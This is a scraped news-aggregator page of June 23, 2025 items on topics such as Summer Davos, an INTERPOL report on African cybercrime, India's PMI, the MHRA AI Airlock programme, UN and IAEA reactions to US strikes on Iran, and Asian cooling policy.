Category: AM-NC

MIL-OSI China: Chinese premier to attend 2025 Summer Davos

Source: People’s Republic of China – State Council News

BEIJING, June 23 — Chinese Premier Li Qiang will attend the 16th Annual Meeting of the New Champions (AMNC), also known as the Summer Davos, in Tianjin from June 24 to 25, foreign ministry spokesperson Guo Jiakun announced here on Monday.

Premier Li Qiang will attend the opening plenary and deliver a special address, meet with foreign guests, and have a conversation with representatives of the foreign business community, Guo said.

President of Ecuador Daniel Noboa, Prime Minister of Singapore Lawrence Wong, Prime Minister of Kyrgyzstan Adylbek Aleshovich Kasymaliev, Prime Minister of Senegal Ousmane Sonko, and Prime Minister of Vietnam Pham Minh Chinh will attend the AMNC, according to Guo.

Over 1,700 representatives from the political, business, academic and media communities of over 90 countries and regions will also take part in the AMNC, Guo added.

MIL OSI China News –

June 23, 2025
MIL-OSI Security: New INTERPOL report warns of sharp rise in African cybercrime
Source: Interpol (news and events)

Two-thirds of African member countries said cyber-related offences accounted for a medium-to-high share of all crimes
- Cybercrime accounts for more than 30 per cent of all reported crime in Western and Eastern Africa.
- Online scams, ransomware, business email compromise and digital sextortion are the most reported cyberthreats.
- 90 per cent of African countries report needing ‘significant improvement’ in law enforcement or prosecution capacity.
LYON, France: A growing share of reported crimes in Africa is cyber-related, according to INTERPOL’s 2025 Africa Cyberthreat Assessment Report.

Two-thirds of the Organization’s African member countries surveyed said that cyber-related crimes accounted for a medium-to-high share of all crimes, rising to 30 per cent in Western and Eastern Africa.

Online scams, particularly through phishing, were the most frequently reported cybercrimes in Africa, while ransomware, business email compromise (BEC) and digital sextortion also remain widespread.

Neal Jetton, INTERPOL Cybercrime Director, said:

“This fourth edition of the INTERPOL African Cyberthreat Assessment provides a vital snapshot of the current situation, informed by operational intelligence, extensive law enforcement engagement and strategic private-sector collaboration. It paints a clear picture of a threat landscape in flux, with emerging dangers like AI-driven fraud that demand urgent attention. No single agency or country can face these challenges alone.”

Ambassador Jalel Chelba, Acting Executive Director of AFRIPOL, said:

“Cybersecurity is not merely a technical issue; it has become a fundamental pillar of stability, peace, and sustainable development in Africa. It directly concerns the digital sovereignty of states, the resilience of our institutions, citizen trust and the proper functioning of our economies.”

Africa’s top cyberthreats

In the past year, suspected scam notifications rose by up to 3,000 per cent in some African countries, according to data from Kaspersky – one of several private sector partners that works with INTERPOL’s cybercrime directorate.

Ransomware detections in Africa also rose in 2024, with South Africa and Egypt suffering the highest number, at 17,849 and 12,281 detections respectively according to data from Trend Micro, followed by other highly digitized economies such as Nigeria (3,459) and Kenya (3,030).

Incidents included attacks on critical infrastructure, such as a breach at Kenya’s Urban Roads Authority (KURA), and on government databases, such as hacks of Nigeria’s National Bureau of Statistics (NBS).

BEC-related incidents also rose significantly, with 11 African nations accounting for the majority of BEC activity originating on the continent. In West Africa, BEC fraud has driven highly organized, multi-million-dollar criminal enterprises, such as transnational syndicate Black Axe.

Sixty per cent of African member countries reported an increase in reports of digital sextortion, where threat actors use sexually explicit images to blackmail their targets. The images can be authentic – shared voluntarily or obtained through coercion or deception – or they can be generated by artificial intelligence.

Law enforcement challenges

Cybercrime continues to outpace the legal systems designed to stop it, according to African law enforcement. Seventy-five per cent of countries surveyed said their legal frameworks and prosecution capacity needed improvement.

At the same time, countries also reported struggling to enforce the existing laws on cybercrime, with 95 per cent of respondents reported inadequate training, resource constraints and a lack of access to specialized tools.

Despite rising caseloads, most African member countries surveyed still lack essential IT infrastructure to combat cybercrime. Just 30 per cent of countries reported having an incident reporting system, 29 per cent a digital evidence repository and 19 per cent a cyberthreat intelligence database.

While cybercrime routinely crosses national borders, 86 per cent of African member countries surveyed said their international cooperation capacity needs improvement due to slow, formal processes, a lack of operational networks, and limited access to platforms and foreign-hosted data.

Cybercrime investigations increasingly rely on cooperation from private sector partners, yet 89 per cent of African countries said their cooperation with the private sector needed ‘significant’ or ‘some’ improvement due to unclear channels for engagement, low institutional readiness and other barriers.

Strengthening cyber resilience

Nevertheless, the INTERPOL report also details positive steps that many African member countries have made to strengthen their cyber resilience.

Several African countries advanced their legal frameworks, harmonizing cybersecurity laws with international standards. Many countries also enhanced their cybercrime response capabilities, investing in specialized units and digital forensics infrastructure.

This increased operational capacity was demonstrated in two high-impact international cybercrime operations coordinated by INTERPOL – Operation Serengeti and Operation Red Card – which collectively led to more than 1,000 arrests and the dismantling of hundreds of thousands of malicious networks.

To further improve Africa’s cybercrime response capabilities, the INTERPOL report proposes six strategic recommendations, including improving regional and international cooperation, expanding prevention and public awareness, and leveraging emerging technologies.

INTERPOL’s Africa Cyberthreat Assessment is part of the Organization’s African Joint Operation against Cybercrime (AFJOC) initiative, which is aimed at strengthening the capability of African law enforcement to prevent, detect, investigate and disrupt cybercrime. The AFJOC initiative is supported by the United Kingdom’s Foreign, Commonwealth and Development Office.

In addition to information gathered from INTERPOL member countries in Africa, the Assessment benefits from data contributed by private sector partners Bi.Zone, Group-IB, Kaspersky and Trend Micro.

Download the INTERPOL’s 2025 Africa Cyberthreat Assessment Report via the link below.
MIL Security OSI –
June 23, 2025
MIL-OSI China: China to announce plans for marking 80th anniv of victory against Japanese aggression, fascism

Source: People’s Republic of China – State Council News

China’s State Council Information Office will hold a press conference at 10 a.m. Tuesday to unveil plans for marking the 80th anniversary of the victory in the Chinese People’s War of Resistance Against Japanese Aggression and the World Anti-Fascist War.

Hu Heping, executive vice minister of the Publicity Department of the Communist Party of China Central Committee, is expected to brief the media on the arrangement of commemorative activities and take questions along with other officials.

MIL OSI China News –

June 23, 2025
MIL-OSI China: 2025 Beijing Intl Book Fair draws visitors from China and abroad

Source: People’s Republic of China – State Council News

Editor’s Note: The 31st Beijing International Book Fair (BIBF) kicked off in Beijing on June 18, showcasing about 220,000 books from China and abroad. The event features more than 1,700 exhibitors from 80 countries and regions, with Malaysia serving as this year’s guest country of honor.

The United Arab Emirates booth at the 2025 Beijing International Book Fair (BIBF), June 20, 2025. [Photo by Chen Xinyan/China.org.cn]

1 2 3 4 5 6 7 8 9 10 11 12 >

MIL OSI China News –

June 23, 2025
India’s economic activity hits 14-month high in June: HSBC report

Source: Government of India

Source: Government of India (4)

India’s economic activity reached a 14-month high in June, driven by a sharp increase in new business orders and a record rise in exports, according to HSBC’s flash Purchasing Managers’ Index (PMI) data released on Monday. The HSBC Flash India Composite Output Index, which reflects the combined performance of the manufacturing and services sectors, rose to 61.0 in June from 59.3 in May, indicating robust expansion well above the long-term average.

Manufacturers led the momentum, although the services sector also recorded stronger growth. June’s PMI readings marked the fastest expansion in manufacturing in two months and in services in ten months. The report attributes the upturn to healthy demand conditions, successful marketing efforts, and increased investment in technology, which helped firms boost output.

As workloads continued to pile up, companies responded with higher hiring activity. Both manufacturing and services sectors saw job creation, with manufacturers particularly ramping up recruitment to keep pace with rising backlogs. Although services hiring slightly weakened on a month-on-month basis, overall employment growth remained positive.

On the inflation front, input costs rose at the slowest rate in ten months, easing some pressure on firms. Output prices also increased, but at a moderated pace. According to panellists, the moderation in cost pressures was supported by operational efficiencies and favourable market conditions.

The HSBC Flash India Manufacturing PMI climbed from 57.6 in May to 58.4 in June, marking the best improvement in operating conditions since April 2024. Meanwhile, the growth in new business orders and exports was strongest among goods producers, although services firms also experienced a meaningful uptick.

Pranjul Bhandari, Chief India Economist at HSBC, noted that the strong growth in June was underpinned by a continued rise in new export orders, especially in the manufacturing sector. She added that employment remained resilient and that although price pressures persisted, the pace of inflation was easing.

The report signals strong private sector momentum as India enters the second half of 2025, with the combination of rising demand, controlled inflation, and steady job creation pointing to a favourable economic outlook.

-IANS

June 23, 2025
The Soul of Yoga: Transcending physical practice for spiritual awakening

Source: Government of India

Source: Government of India (4)

While yoga is often considered a physical exercise or practice, it is fundamentally a spiritual discipline, as it encompasses meditation, breath control and ethical principles aimed at unifying mind, body and soul with divine power. It endeavours to develop inner peace and self-awareness, which ultimately leads one onto the path of spiritual enlightenment. Originating over 5,000 years ago, yoga is a holistic system for self-realization, inner peace and union with the divine.

In recent decades, yoga’s universal appeal and multiple benefits have led to its adoption across faiths, cultures and religions worldwide in their own ways, making it a universally effective tool to confront modern-day mental, physical and psychological challenges, which finally leads one to a spiritual path. Hence, great Hindu scriptures like the Bhagavad Gita describe it as a way to attain inner peace and freedom from the cycle of rebirth.

Nowadays, medical practitioners across the globe often recommend yoga as a holistic way to maintain health-related vital parameters. They suggest it for improving physical flexibility, reducing stress and enhancing psychological well-being. In recent decades, its therapeutic benefits have made it a globally embraced tool for wellness, transcending its religious roots.

However, in Hinduism, yoga’s spiritual purpose supersedes all others. Its core purpose in Hinduism is to facilitate spiritual growth and enlightenment, leading to union with the divine. Hinduism fundamentally considers yoga a sacred practice designed to foster spiritual growth and self-realization. Its ultimate aim is to unite the individual soul with the universal divine. While yoga’s modern adaptations often emphasize physical postures and stress relief, traditional yogic practices encompass ethical disciplines, meditation and breath control as pathways to spiritual enlightenment.

This is why many yogic postures and practices are deeply associated with Hindu deities, spirituality, mythology and symbolism. For example, Shiva is often revered as Adiyogi in Hindu spiritual traditions. Adiyogi means the originator of yogic practices. Lord Shiva also symbolizes the ascetic ideals of meditation, wisdom and the dissolution of ego. Similarly, Surya Namaskar is a dynamic sequence honouring the sun god, reflecting Vedic traditions of solar worship and vitality.

Yoga also includes several other deity-inspired postures. For example, poses like Hanumanasana or Natrajasana, which represents Shiva’s cosmic dance, embody divine stories and virtues. These divine elements reveal yoga’s sacred roots, where physical movements become a form of devotion and a bridge between the physical and spiritual being.

While modern yoga may be widely known for its benefits like fitness and flexibility, its traditional purpose in Hinduism runs far deeper. It is a transformative path, or indeed a sadhana, that integrates mastery of the senses, helping practitioners withdraw from the myriad distractions of life and turn inward.

Similarly, meditation or dhyana cultivates focused awareness beyond fleeting thoughts, which helps achieve desired successes in life. Yoga also aids the self-realization process, which is a method of awakening to one’s true self, paving the way to the stillness of enlightenment or samadhi. Unlike conventional workouts, yoga aims for self-discovery and realization, besides its physical health related benefits.

In fact, asana, or physical postures, prepare the body for meditation by releasing tension and achieving the mindset required to transcend the ordinary boundaries of the life cycle. Nowadays, we often hear about mindfulness as a way to restrict distractions, which yoga helps achieve remarkably. Here, it is worthwhile to know that mindfulness is the practice of paying deliberate, non-judgmental attention to the present moment, which helps reduce stress, enhances focus and cultivates emotional balance.

In traditional forms of yoga, mantras are also chanted. The union of yoga and mantra is considered a profound spiritual tool that elevates consciousness and deepens one’s connection with the divine. Yogic practices incorporating mantra guide practitioners toward inner transformation and self-realization. Yoga, through its asanas, pranayama and meditation, purifies the body and mind, creating a receptive state for higher awareness. When combined with mantra, which are sacred sounds or vibrations, yoga becomes a powerful medium to align individual energy with universal consciousness.

Mantras, such as Om carries spiritual frequencies that quiet the mind and awaken deeper states of awareness. Chanting mantras with devotion fosters surrender, dissolving the ego and allowing the practitioner to merge with divine energy. This devotional aspect of yoga, known as Bhakti Yoga, emphasizes love, surrender and unwavering faith in the higher power. The repetition of mantras purifies thoughts, emotions and intentions, leading to inner peace and spiritual awakening.

Together, yoga and mantra create a harmonious path towards enlightenment. While yoga prepares the body and mind for stillness, mantra elevates the soul, bringing us closer to the divine. This union of discipline and devotion cultivates a life of balance, wisdom and unconditional love. Without doubt, yoga is an inward journey and a sacred practice that elevates our existence. By embracing its spiritual roots, we move into a life of harmony, purpose and divine connection.

June 23, 2025
IMD predicts heavy rainfall across India as monsoon advances further

Source: Government of India

Source: Government of India (4)

The India Meteorological Department (IMD) has predicted a significant increase in rainfall activity over northwest India starting June 25, with isolated heavy to very heavy showers expected across the region.

Central, eastern, and northeastern India are also likely to witness continued intense rainfall over the next seven days, with extremely heavy rainfall (over 20 cm in 24 hours) forecast for west Madhya Pradesh on June 23 and 24.

The IMD stated that conditions remain favourable for the further advance of the Southwest Monsoon over the remaining parts of the North Arabian Sea, as well as additional areas in Rajasthan, Punjab, Haryana, Chandigarh, Delhi, West Uttar Pradesh, Himachal Pradesh, and Jammu, over the next two days.

Very heavy rainfall is likely in East Rajasthan, Madhya Pradesh, Bihar, Konkan, and Arunachal Pradesh on June 23 and 24, and in Vidarbha on June 24. Jharkhand may see similar conditions on June 26, while Odisha, Haryana, Punjab, and West Uttar Pradesh are expected to receive heavy to very heavy rain on June 25 and 26. Gujarat, Assam and Meghalaya, and Nagaland are likely to experience very heavy rainfall on June 23. Himachal Pradesh and Uttarakhand are forecast to receive heavy rain between June 23 and 27, and similar conditions are expected in Jammu-Kashmir-Ladakh-Gilgit-Baltistan-Muzaffarabad on June 25.

The IMD has advised people in affected areas to stay alert and take necessary precautions as monsoon intensifies across several regions of the country.

June 23, 2025
MIL-OSI United Kingdom: AI breakthroughs drive expansion of ‘Airlock’ testing programme to support AI-powered healthcare innovation
Source: United Kingdom – Government Statements

Press release

AI breakthroughs drive expansion of ‘Airlock’ testing programme to support AI-powered healthcare innovation

MHRA opens second round of applications to test cutting-edge AI medical technologies following successful pilot phase.
A £1 million boost to the Medicines and Healthcare products Regulatory Agency’s (MHRA) pioneering AI Airlock programme will expand access to a first-of-its-kind regulatory testing ground where companies can work directly with regulators to safely test new AI-powered medical devices and explore how to bring them to patients faster, through streamlined regulations.

Applications for the second round of the programme open today (23 June 2025) and follow a successful pilot phase that saw four breakthrough AI technologies, including software that could help doctors create personalised cancer treatment plans, and a tool to help hospitals, AI developers, and regulators monitor AI performance in real time, tested in a regulatory ‘sandbox’ environment.

Similar to an airlock on a spacecraft, the ‘sandbox’ testing space creates a boundary between experimental AI and fully approved medical technology used in the real world.

This initiative builds on commitments in the Government’s AI Opportunities Action Plan and the government response to the Regulatory Horizons Council report on regulation of AI as a medical device to enable safe AI innovation through strategic guidance to regulators and enhance their AI capabilities.

This programme is backed by the Government’s new Regulatory Innovation Office (RIO), which is supporting regulators to test more agile, flexible ways of working that can keep pace with emerging technologies like AI. By cutting unnecessary red tape and making the UK a more innovation-friendly environment, the RIO is helping to deliver the Government’s Plan for Change – backing high-growth industries, supporting NHS innovation, and accelerating technologies that can make a real difference to people’s lives.

Science Minister, Lord Vallance, said:

“Backing innovation means backing better regulation – and that’s what the RIO is here to do.

“Smarter, faster approaches like the AI Airlock are helping to cut red tape, bring safe new technologies to patients quicker, and ease pressure on our NHS – fuelling the Government’s Plan for Change.”

Health Minister, Baroness Merron, said:

“AI has huge potential to improve healthcare, and we need to use it safely and responsibly. The AI Airlock programme is a great example of how we can test new technology thoroughly while still moving quickly.

“This £1 million investment will help bring new medical tools to patients faster and strengthen the UK’s position as a global leader in healthcare innovation.”

Those selected for the next round of the AI Airlock programme will be able to test their AI healthcare products under careful supervision allowing for regulatory challenges to be identified early and adjustments made.

James Pound, MHRA Interim Executive Director, Innovation and Compliance, said:

“Traditional regulatory pathways weren’t designed with AI’s unique characteristics in mind – including its capacity to analyse large quantities of data and help automate existing manual processes. The AI Airlock programme helps address this gap by creating a supervised testing ground where these novel technologies and challenge areas can be safely investigated.

“The technologies and devices which have been evaluated to date have shown the limitless potential of AI to improve patient outcomes, free up NHS resources, and enhance the accuracy and efficiency of healthcare services.

“With AI, we must balance robust oversight with flexibility that doesn’t stifle innovation, and this programme achieves that balance.”

Four projects were selected for the inaugural AI Airlock cohort, each focused on addressing critical healthcare challenges using AI. Among them was health technology multinational Philips’ Radiology Auto Impression project which tested the use of generative AI to automate the writing of radiologists’ final impressions – a critical section of radiology reports that summarises key findings from imaging procedures.

Working directly with MHRA experts through weekly meetings, the team gained valuable insights about the need to involve their end users – radiologists – to help define testing strategies. As Yinnon Dolev, Philips’ Advanced Development NLP (Natural Language Processing) Tech Lead noted, the collaboration with regulators was “almost unheard of” and provided “a catalyst for meaningful progress expediting our development activities.”

OncoFlow, another first round project, looked at the use of AI to help healthcare professionals create personalised management plans for cancer patients, with the potential to reduce waiting times for cancer appointments, leading to earlier treatment and the possibility of significantly increasing patients’ chances of survival. Co-founder Aruni Ghose said the Airlock programme provided his team with the chance to validate the product in a simulated clinical setting and “pressure-test it against real regulatory standards” which has helped the company accelerate its progress “from idea to a validated MVP (Minimum Viable Product).”

Rounding out the cohort have been two projects; one by Automedica Ltd, investigating the regulatory advantages of using retrieval-augmented generation (RAG) technologies with verified knowledge bases and Large Language Models (LLMs); and the other by health tech startup Newton’s Tree testing its Federated AI Monitoring Service (FAMOS) to identify and mitigate AI risks in clinical settings, including performance drift or safety issues.

Results from all four pilot projects will be published later this year, providing valuable insights that will shape the AI Airlock programme moving forward and help inform broader regulatory approaches to the effective and safe use AI in healthcare.

Eligible candidates for the second cohort must demonstrate that their AI-powered medical device has the potential to deliver significant benefits to patients and the NHS, presents a new treatment approach, and offers a regulatory challenge ready to be tested in the Airlock programme.

Applications for cohort two open on 23 June 2025 and will close on 14 July 2025.

Notes to editors

Applications for the AI Airlock programme’s second cohort are open from 23 June – 14 July 2025. More information can be found at AI Airlock: the regulatory sandbox for AIaMD – GOV.UK.

The programme was launched in Spring 2024 and is the MHRA’s first regulatory sandbox for AI as a Medical Device (AIaMD) products.

The Medicines and Healthcare products Regulatory Agency (MHRA) is responsible for regulating all medicines and medical devices in the UK by ensuring they work and are acceptably safe. All work is underpinned by robust and fact-based judgements to ensure that benefits justify any risks.

The MHRA is an executive agency of the Department of Health and Social Care.

For media enquiries, please contact newscentre@mhra.gov.uk or call 020 3080 7651.

Share this page

The following links open in a new tab

Share on Facebook (opens in new tab)

Share on Twitter (opens in new tab)

Updates to this page

Published 23 June 2025
MIL OSI United Kingdom –
June 23, 2025
MIL-OSI Russia: 2025 FIBA 3×3 World Championship Kicks Off in Mongolia

Translation. Region: Russian Federal

Source: People’s Republic of China in Russian – People’s Republic of China in Russian –

Source: People’s Republic of China – State Council News

ULAN BATOR, June 23 (Xinhua) — The 2025 FIBA 3×3 World Championship kicked off in Mongolia’s capital on Monday.

The ninth edition of this prestigious basketball tournament will feature 20 men’s and 20 women’s teams from countries such as China, Mongolia, Austria, Belgium, Germany, Switzerland and the United States. They will compete for the right to become world champions.

The competition, which runs until Sunday, promises exciting basketball matches with the best teams and players battling for glory. –0–

MIL OSI Russia News –

June 23, 2025
MIL-OSI Russia: UN chief condemns attack on peacekeepers in Central African Republic

Translation. Region: Russian Federal

Source: People’s Republic of China in Russian – People’s Republic of China in Russian –

Source: People’s Republic of China – State Council News

UNITED NATIONS, June 23 (Xinhua) — United Nations Secretary-General Antonio Guterres on Sunday condemned an attack by unidentified gunmen on a United Nations peacekeeping patrol in the Central African Republic (CAR) on Friday, his spokesman said.

The attack, which took place in Vakaga prefecture, left a Zambian peacekeeper dead and another wounded.

Noting that attacks on UN peacekeepers may constitute war crimes under international law, A. Guterres called on the CAR authorities to make every effort to identify those responsible so that they are promptly brought to justice, according to a statement from spokesman Stephane Dujarric.

The Secretary-General expressed his deepest condolences to the family of the deceased peacekeeper, the Government and the people of Zambia, and wished the wounded soldier a speedy and full recovery, the statement said. –0–

MIL OSI Russia News –

June 23, 2025
MIL-OSI Russia: UN chief warns of ‘retaliation’ after US strikes on Iran

Translation. Region: Russian Federal

Source: People’s Republic of China in Russian – People’s Republic of China in Russian –

Source: People’s Republic of China – State Council News

UNITED NATIONS, June 23 (Xinhua) — United Nations Secretary-General Antonio Guterres on Sunday warned of the possibility of “retaliation” following the U.S. strikes on Iranian nuclear facilities.

The US bombing of Iranian nuclear facilities marks a dangerous turn in a region already reeling, A. Guterres said at an emergency meeting of the UN Security Council.

“Since the beginning of the /Israeli-Iranian/ crisis, I have repeatedly condemned any military escalation in the Middle East. The people of the region cannot bear another cycle of destruction. And yet, we now risk falling into a vortex of mutual retaliation,” he warned.

To avoid further escalation, diplomacy must prevail, civilians must be protected and the safety of maritime navigation must be guaranteed, the UN chief said.

“We must act immediately and decisively to stop the fighting and return to serious, lasting negotiations on Iran’s nuclear program,” he urged.

A. Guterres called for a credible, comprehensive and verifiable solution to restore confidence, including inspections by the International Atomic Energy Agency.

He stressed that the Nuclear Non-Proliferation Treaty is the cornerstone of international peace and security, adding that Iran must fully comply with it.

All member states, he said, must act in accordance with their obligations under the UN Charter and other international law, including international humanitarian law.

“The UN stands ready to support any efforts aimed at a peaceful settlement. But peace cannot be imposed; it must be chosen,” the UN Secretary-General said. “We face a stark choice. One path leads to more war, more human suffering, and serious damage to the international order. The other path leads to de-escalation, diplomacy, and dialogue. We know which path is right.”

He also called on the Security Council and all UN member states to act with prudence, restraint and urgency in the name of peace. –0–

MIL OSI Russia News –

June 23, 2025
MIL-OSI Russia: International nuclear non-proliferation regime could collapse after US strikes on Iran – IAEA chief

Translation. Region: Russian Federal

Source: People’s Republic of China in Russian – People’s Republic of China in Russian –

Source: People’s Republic of China – State Council News

UNITED NATIONS, June 23 (Xinhua) — The international nuclear non-proliferation regime could collapse unless diplomacy returns, International Atomic Energy Agency (IAEA) Director General Rafael Grossi told an emergency meeting of the UN Security Council on Sunday following U.S. airstrikes on Iranian nuclear sites on Saturday.

“The nuclear non-proliferation regime, which has underpinned international security for more than half a century, is under threat. Events in Iran have become even more alarming after the overnight bombings and the possible widening of the conflict,” he said.

“We have a window of opportunity to return to dialogue and diplomacy. If it closes, violence and destruction could reach unimaginable levels, and the global non-proliferation regime as we know it would simply collapse,” he warned.

Iran, Israel and the Middle East need peace and there is a path for diplomacy, said R. Grossi, stressing the need to return to the negotiating table.

Assessing the consequences of the US strikes, he reported that there was destruction at the facilities, but no radiation leaks were recorded.

According to information received from the Iranian side, the radiation level outside the three sites in Fordow, Isfahan and Natanz has not increased, he added.

He said the IAEA had consistently stressed that armed attacks on nuclear facilities should not occur and could result in radioactive releases with serious consequences both within and beyond the attacked state. He reiterated his call for maximum restraint.

“Let’s not let the window of diplomacy slam shut. Let’s not let the non-proliferation regime collapse. Regardless of individual positions and views, one thing is certain, and it is a simple truth: we will not be safer if more states around the world have more nuclear weapons,” concluded R. Grossi. –0–

MIL OSI Russia News –

June 23, 2025
MIL-Evening Report: View from the Hill: Albanese supports US bombing, reluctantly

Source: The Conversation (Au and NZ) – By Michelle Grattan, Professorial Fellow, University of Canberra

When Prime Minister Anthony Albanese and Foreign Minister Penny Wong went out on Monday to back the United States attack on Iran, it was obvious their support was through gritted teeth.

Albanese told their joint news conference: “The world has long agreed that Iran cannot be allowed to get a nuclear weapon. And we support action to prevent that. That is what this is.

“The US action was directed at specific sites central to Iran’s nuclear program. We don’t want escalation and a full-scale war. We continue to call for dialogue and for diplomacy. As I’ve said for many days now, we are deeply concerned about any escalation in the region and we want to see diplomacy, dialogue and de-escalation.”

At the news conference and in Wong’s media round beforehand, one big question was, why did they take so long to appear?

The attack is a seismic event in the Middle East conflict. Yet on Sunday the government only put out a tepid statement attributed to a “spokesperson”, which did not endorse the American action.

This suggests the prime minister and foreign minister are, at the very least, uncomfortable with the action.

It is further evidence of the current distance between the Australian government and the Trump administration. Whether it affects Albanese’s attempt to get the now much-sought after bilateral remains to be seen.

At every stage of the Middle East conflict, as the situation has progressively escalated, the Australian government has been urging restraint and/ or de-escalation.

Albanese is caught between not wanting to repudiate the Americans, the conflicting pressures of domestic lobbies, and his Labor constituency.

Over the years, Albanese has moved to the political centre. But he hasn’t taken down from his website a strong speech he made in 2003 opposing the Iraq war.

“In the short term, the conflict that is now clearly about to start can only make things worse, perhaps much worse,” Albanese told parliament then. “Iraq does not represent a threat to Australia. We are, with this [Howard government] decision, supporting a pre-emptive strike, which changes forever the way that international politics works.”

In that war and this war, some of the same issues are at play. Iraq was thought to have weapons of mass destruction – later it was found it did not. Iran has long been on the path to developing nuclear weapons, but there are varying intelligence assessments of how much progress it has made.

One can’t help thinking Albanese probably has the same sort of reservations about the Iran strike that he did about the Iraq war.

For Australia’s there is one big difference: there is no thought of involving Australian defence forces, as happened in Iraq.

Former Labor senator Doug Cameron, in parliament from 2008 to 2019 and a firebrand of the left, on Monday recalled how then opposition leader Simon Crean opposed Australia’s support for and participation in the Iraq war. (Crean said, “Never allow our foreign policy to be determined by another nation. Never commit to unnecessary war when peace is possible.”)

Cameron, now a national patron of Labor Against War, issued several tweets condemning the government’s stand, and saying “time for Labor backbenchers to speak up”.

But the Labor backbench is far from what it once was. Hardly anyone speaks up to challenge anything. As for the left, it is a shadow of its old feisty self.

“What has happened to the left?” Cameron asks. “To be honest I don’t understand it,” he admits to The Conversation.

Cameron recalls how the left – and indeed the wider caucus – was up in arms when Bob Hawke in the mid-1980s wanted Australia to facilitate the Americans’ testing of MX missiles that would splash down in the Tasman Sea. Hawke had to back down.

He wonders if it’s a matter of not wanting to contradict a “left prime minister, and a left foreign minister”. “Personal support and party solidarity have come before common sense.”

There are many causes of the demise of the ALP left, as Cameron knew it. They include the loss of what power Labor’s rank-and-file once had, the splintering of the left more broadly to minor parties notably the Greens, and the decline of ideology within Labor (and generally). There is no current “Doug Cameron”-equivalent in the caucus. The factions no longer fight over ideas – they preside over spoils.

Those who contest the thesis of the decline of the left argue the contemporary Labor left has been shaping the Albanese government’s agenda on key issues from within, for example on industrial relations, industry policy, climate policy, and gender issues.

If the Albanese of 2003 could have foreseen what the caucus left of 2025 would be like, he’d have been surprised, and possibly shocked. As it is, he’s pretty pleased the left is so quietly behaved.

Michelle Grattan does not work for, consult, own shares in or receive funding from any company or organisation that would benefit from this article, and has disclosed no relevant affiliations beyond their academic appointment.

– ref. View from the Hill: Albanese supports US bombing, reluctantly – https://theconversation.com/view-from-the-hill-albanese-supports-us-bombing-reluctantly-258967

MIL OSI Analysis – EveningReport.nz –

June 23, 2025
MIL-OSI Banking: Development Asia: Cooling Without Warming: Policy Solutions for Asia’s Rising Cooling Demand

Source: Asia Development Bank

Develop an effective legislative framework for climate-friendly cooling.

For developing Asia, establishing a robust legislative framework is essential to enable climate-friendly cooling. Best practices from advanced economies, such as the European Union (EU), Japan, and the United States, can inform the development of integrated energy conservation and clean air legislation to support commitments to carbon reduction and the phaseout of high-GWP refrigerants. A strong legislative foundation allows for the phased implementation of more specific policies and measures.

Within such frameworks, several countries and regions have developed sector-level strategies and action plans. Examples include the EU’s Heating and Cooling Strategy and the PRC’s National Green Cooling Action Plan, which enforce targeted measures and standards. Others have launched directives and programs focused on deploying low-carbon cooling technologies in buildings, households, and appliances, such as California’s Building Energy Benchmarking Program, Home Energy Rating System, and Energy Partnership Program. Some jurisdictions have also integrated cooling sector policies with renewable energy initiatives, such as the EU’s Renewable Energy Directive.

Improve standards and labeling systems, and enhance compliance with efficiency standards.

Governments across Asia should consider establishing minimum energy efficiency standards for cooling appliances and phasing out outdated or inefficient equipment. Japan’s Top Runner Program offers a valuable model—setting energy efficiency requirements based on the most efficient product currently available in the market. These standards should be regularly reviewed and progressively tightened. Benchmarking against the most stringent global standards and developing a clear timeline for alignment can help accelerate progress.

Enforcing a mandatory labeling system is also highly beneficial. Energy labels provide consumers with essential information about the energy performance and refrigerant type of air-conditioning and refrigeration products, enabling more informed purchasing decisions. To be effective, this information should be prominently displayed and easily understood by the average consumer.

Promote low-carbon cooling in public buildings.

Governments can support this goal by implementing procurement policies that prioritize low-carbon cooling equipment in the public sector. For example, the government of the PRC maintains a catalog of recommended energy-saving products for government procurement, which includes high-efficiency air conditioning and refrigeration systems. Public institutions are encouraged to prioritize items from this list when purchasing energy-consuming equipment. Regular updates to the catalog are essential to ensure that selected products maintain optimal energy performance and continue to deliver environmental benefits.

Governments can also introduce policies and pilot programs to integrate renewable energy into public sector cooling systems. For instance, regulations could require that a minimum percentage of available rooftop or surface area on public buildings be dedicated to photovoltaic (solar) power generation.

Develop incentive policies to encourage behavior change.

For low-carbon cooling projects that are not yet widely adopted but offer significant social and environmental benefits, governments should prioritize providing incentives and support to scale up their implementation. For example, the Japanese government has promoted the use of low-GWP natural refrigerants as alternatives to HFCs. However, adoption has been limited due to high upfront costs. To address this, Japan’s Ministry of the Environment offers subsidies covering a portion of the machinery and installation costs for companies that replace or install equipment using natural refrigerants, thereby encouraging the transition to more climate-friendly refrigeration technologies.

Governments should design incentive policies that motivate individuals to adopt energy-efficient behaviors. The PRC, through its Green and High Energy Efficiency Cooling Action Plan, encourages local governments to introduce incentives for purchasing high-efficiency cooling appliances. These may include rebates for energy-efficient products and trade-in programs that allow consumers to exchange low-efficiency appliances for more efficient alternatives.

Monitor and regulate refrigerants and cooling equipment from a life-cycle perspective

Governments should require the registration of all stages of high-GWP refrigerant handling, including production, import, sale, and recycling. Additionally, mandatory regular leak inspections and maintenance record-keeping for existing cooling equipment should be enforced.

Finance large-scale deployment.

One effective strategy is to establish co-financing mechanisms through partnerships among the public sector, multilateral development banks, and private investors. By leveraging government incentive funds and concessional loans from development banks, these partnerships can unlock commercial capital and reduce financial barriers.

Creating revolving loan funds dedicated to low-carbon cooling projects can also expand financing opportunities. These funds can provide continuous support for new initiatives by reinvesting repayments into future projects, thereby sustaining momentum and scaling up deployment across regions.

Take an integrated approach and encourage collective efforts.

Policy solutions for climate-friendly cooling should be designed as part of a holistic package. This means that regulations, policies, standards, and tools must be coordinated to support and reinforce one another, rather than functioning in isolation.

For example, under its net-zero emissions commitment, the EU has implemented a suite of interconnected regulations including the Energy Efficiency Directive, Renewable Energy Directive, Industrial Emissions Directive, European Commission-mandated regulations, and governance regulations. These high-level frameworks are complemented by specific policy measures and initiatives that ensure effective implementation and alignment across sectors.

Build capacity for low-carbon cooling.

Capacity building and knowledge dissemination are key for promoting energy efficiency improvements. Governments in Asia can take policy measures (e.g., promoting the use of appropriate cost–benefit assessment tools) to help customers understand that the long-term economic losses from using low-efficiency equipment often outweigh the initial investment in high-efficiency alternatives.

Poor operational management also contributes to unnecessary energy waste. Therefore, capacity-building efforts should focus on equipping users with the skills needed to manage and operate cooling equipment more efficiently.

It is also necessary to strengthen the capacity of financial institutions to address the financing gaps that hinder the adoption of low-carbon cooling technologies.

MIL OSI Global Banks –

June 23, 2025
Missile Alarms in Jerusalem as U.S.-Iran Tensions Ignite New Escalation in West Asia

Source: Government of India

